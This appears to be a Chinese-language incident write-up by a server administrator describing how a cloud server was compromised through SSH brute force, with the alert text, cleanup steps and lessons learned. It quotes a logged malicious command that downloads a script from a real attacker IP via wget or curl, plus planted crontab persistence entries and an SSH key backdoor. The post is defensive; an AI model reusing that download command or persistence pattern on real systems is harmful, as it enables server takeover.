由于ECS使用了有规律的弱密码被SSH暴力破解(非22端口)
阿里云提示被入侵且执行了恶意代码,安全中心可处理。
相关资料: https://bbs.pediy.com/thread-251753.htm
https://zhuanlan.zhihu.com/p/111351235
但至第二天凌晨时,依旧报警。
父进程路径:/usr/bin/perl
父进程命令行:rsync
父进程id:12354
进程id:12355
用户名:root
URL链接:http://45.55.129.23/tddwrt7s.sh
进程路径:/usr/bin/bash
命令行参数:sh -c wget -q http://45.55.129.23/tddwrt7s.sh || curl -s -O -f http://45.55.129.23/tddwrt7s.sh 2>&1 3>&1
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
------------------------------------
后排查rsync进程目录下有可疑目录,进行了清除。
lrwxrwxrwx 1 root root 0 Mar 19 01:36 cwd -> /dev/shm/.tddddddddd
继续排查了定时计划
[root@izbp168lretu4toy79p12kz ~]# crontab -l
* */2 * * * /root/.bashtemprc/a/upd>/dev/null 2>&1
@reboot /root/.bashtemprc/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.bashtemprc/b/sync>/dev/null 2>&1
@reboot /root/.bashtemprc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X19-unix/.rsync/c/aptitude>/dev/null 2>&1
依旧存在可疑目录,删除
后续发现在/root/.ssh目录中中被植入了黑客的公钥文件authorized_keys, 可以被免密码登录SSH了。。。
--------------------
吸取些教训:
1.切不可用有规律的密码
2.定期检查系统定时任务是否有可疑的任务
3.定期检查/root/.ssh是否被替换了可疑的公钥
